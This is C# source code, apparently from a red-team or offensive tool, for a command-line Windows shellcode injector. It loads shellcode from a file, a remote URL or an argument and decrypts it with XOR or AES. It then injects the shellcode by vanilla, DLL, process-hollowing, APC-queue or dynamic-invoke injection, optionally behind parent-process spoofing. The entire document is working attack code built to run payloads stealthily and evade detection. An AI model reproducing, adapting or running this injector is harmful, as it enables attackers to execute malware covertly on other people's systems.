public static void PPIDDynCodeInject(string binary, byte[] shellcode, int parentpid) { PPIDSpoofing Parent = new PPIDSpoofing(); PROCESS_INFORMATION pinf = Parent.ParentSpoofing(parentpid, binary); DynamicCodeInject(pinf.dwProcessId, shellcode); }
public void PPIDPProcHollow(string binary, byte[] shellcode, int parentpid) { PPIDSpoofing Parent = new PPIDSpoofing(); PROCESS_INFORMATION pinf = Parent.ParentSpoofing(parentpid, binary); ProcessHollowing hollow = new ProcessHollowing(); hollow.CreateSection((uint)shellcode.Length); hollow.FindEntry(pinf.hProcess); hollow.SetLocalSection((uint)shellcode.Length); hollow.CopyShellcode(shellcode); hollow.MapAndStart(pinf); CloseHandle(pinf.hThread); CloseHandle(pinf.hProcess); }
public static void Main(string[] args) { try { logo(); // https://github.com/GhostPack/Rubeus/blob/master/Rubeus/Domain/ArgumentParser.cs#L10 var arguments = new Dictionary <string, string>(); foreach (var argument in args) { var idx = argument.IndexOf(':'); if (idx > 0) { arguments[argument.Substring(0, idx)] = argument.Substring(idx + 1); } else { arguments[argument] = string.Empty; } } WindowsIdentity identity = WindowsIdentity.GetCurrent(); WindowsPrincipal principal = new WindowsPrincipal(identity); if (principal.IsInRole(WindowsBuiltInRole.Administrator)) { PrintInfo($"[!] Process running with {principal.Identity.Name} privileges with HIGH integrity."); } else { PrintInfo($"[!] Process running with {principal.Identity.Name} privileges with MEDIUM / LOW integrity."); } if (arguments.Count == 0) { PrintError("[-] No arguments specified. Please refer the help section for more details."); help(); } else if (arguments.ContainsKey("/help")) { help(); } else if (arguments.Count < 3) { PrintError("[-] Some arguments are missing. Please refer the help section for more details."); help(); } else if (arguments.Count >= 3) { int procid = 0; PPIDSpoofing Parent = new PPIDSpoofing(); string ppid = null; int parentProc = 0; string shellcode = null; byte[] rawshellcode = new byte[] { }; byte[] dllbuf = new byte[] { }; if (arguments.ContainsKey("/pid")) { procid = Convert.ToInt32(arguments["/pid"]); Process process = Process.GetProcessById(procid); } if (arguments.ContainsKey("/parentproc")) { ppid = Convert.ToString(arguments["/parentproc"]); parentProc = Parent.SearchForPPID(ppid); } if (arguments.ContainsKey("/path") && System.IO.File.Exists(arguments["/path"])) { if (arguments["/t"] != "2") { if (arguments["/f"] == "raw") { rawshellcode = System.IO.File.ReadAllBytes(arguments["/path"]); } else { shellcode = System.IO.File.ReadAllText(arguments["/path"]); } } else if (arguments["/t"] == "2") { dllbuf = Encoding.Default.GetBytes(arguments["/path"]); } } else if (arguments.ContainsKey("/url")) { if (arguments["/t"] != "2") { if (arguments["/f"] == "raw") { rawshellcode = GetRawShellcode(arguments["/url"]); } else { shellcode = GetShellcode(arguments["/url"]); } } } else if (arguments.ContainsKey("/sc")) { if (arguments["/f"] == "base64" || arguments["/f"] == "hex") { shellcode = arguments["/sc"]; } } if (arguments["/t"] != "2" && (shellcode != null || rawshellcode.Length > 0)) { byte[] xorshellcode = new byte[] { }; byte[] aesshellcode = new byte[] { }; byte[] buf = new byte[] { }; if (arguments.ContainsKey("/enc") == true && arguments["/enc"] == "xor") { if (arguments["/f"] == "base64") { xorshellcode = Convert.FromBase64String(shellcode); buf = xor(xorshellcode, Encoding.ASCII.GetBytes(arguments["/key"])); } else if (arguments["/f"] == "hex") { xorshellcode = StringToByteArray(shellcode); buf = xor(xorshellcode, Encoding.ASCII.GetBytes(arguments["/key"])); } else if (arguments["/f"] == "c") { xorshellcode = convertfromc(shellcode); buf = xor(xorshellcode, Encoding.ASCII.GetBytes(arguments["/key"])); } else if (arguments["/f"] == "raw") { buf = xor(rawshellcode, Encoding.ASCII.GetBytes(arguments["/key"])); } } else if (arguments.ContainsKey("/enc") == true && arguments["/enc"] == "aes") { byte[] passwordBytes = Encoding.UTF8.GetBytes(arguments["/key"]); passwordBytes = SHA256.Create().ComputeHash(passwordBytes); if (arguments["/f"] == "base64") { aesshellcode = Convert.FromBase64String(shellcode); buf = AES_Decrypt(aesshellcode, passwordBytes); } else if (arguments["/f"] == "hex") { aesshellcode = StringToByteArray(shellcode); buf = AES_Decrypt(aesshellcode, passwordBytes); } else if (arguments["/f"] == "c") { aesshellcode = convertfromc(shellcode); buf = AES_Decrypt(aesshellcode, passwordBytes); } else if (arguments["/f"] == "raw") { buf = AES_Decrypt(rawshellcode, passwordBytes); } } else { if (arguments["/f"] == "base64") { buf = Convert.FromBase64String(shellcode); } else if (arguments["/f"] == "hex") { buf = StringToByteArray(shellcode); } else if (arguments["/f"] == "c") { buf = convertfromc(shellcode); } else if (arguments["/f"] == "raw") { buf = rawshellcode; } } if (arguments["/t"] == "1") { if (arguments.ContainsKey("/parentproc")) { if (arguments.ContainsKey("/ppath")) { PrintTitle($"[>>] Parent Process Spoofing with Vanilla Process Injection Technique."); PPIDCodeInject(arguments["/ppath"], buf, parentProc); } else { PrintError("[-] /ppath argument is missing"); } } else { PrintTitle($"[>>] Vanilla Process Injection Technique."); CodeInject(procid, buf); } } else if (arguments["/t"] == "3") { if (arguments.ContainsKey("/ppath")) { if (arguments.ContainsKey("/parentproc")) { PrintTitle($"[>>] Parent Process Spoofing with Process Hollowing Technique."); ProcessHollowing prochollow = new ProcessHollowing(); prochollow.PPIDPProcHollow(arguments["/ppath"], buf, parentProc); } else { PrintTitle($"[>>] Process Hollowing Injection Technique."); ProcessHollowing prochollow = new ProcessHollowing(); prochollow.ProcHollow(arguments["/ppath"], buf); } } else { PrintError("[-] /ppath argument is missing"); } } else if (arguments["/t"] == "4") { if (arguments.ContainsKey("/ppath")) { if (arguments.ContainsKey("/parentproc")) { PrintTitle($"[>>] Parent Process Spoofing with APC Queue Injection Technique."); PPIDAPCInject(arguments["/ppath"], buf, parentProc); } else { PrintTitle($"[>>] APC Queue Injection Technique."); PROCESS_INFORMATION processInfo = StartProcess(arguments["/ppath"]); APCInject(processInfo.dwProcessId, processInfo.dwThreadId, buf); } } else { PrintError("[-] /ppath argument is missing"); } } else if (arguments["/t"] == "5") { if (arguments.ContainsKey("/parentproc")) { if (arguments.ContainsKey("/ppath")) { PrintTitle($"[>>] Dynamic Invoke - Parent Process Spoofing with Vanilla Process Injection Technique."); PPIDDynCodeInject(arguments["/ppath"], buf, parentProc); } else { PrintError("[-] /ppath argument is missing"); } } else { PrintTitle($"[>>] Dynamic Invoke - Vanilla Process Injection Technique."); DynamicCodeInject(procid, buf); } } } else if (arguments["/t"] == "2") { if (arguments.ContainsKey("/parentproc")) { if (arguments.ContainsKey("/ppath")) { PrintTitle($"[>>] Parent Process Spoofing with DLL Injection Technique."); PPIDDLLInject(arguments["/ppath"], dllbuf, parentProc); } else { PrintError("[-] /ppath argument is missing"); } } else { PrintTitle($"[>>] DLL Injection Technique."); DLLInject(procid, dllbuf); } } else { PrintError("[-] Please check the specified file path or the URL."); } } else { PrintError("[-] Invalid argument. Please refer the help section for more details."); help(); } } catch (Exception ex) { PrintError(ex.Message); } }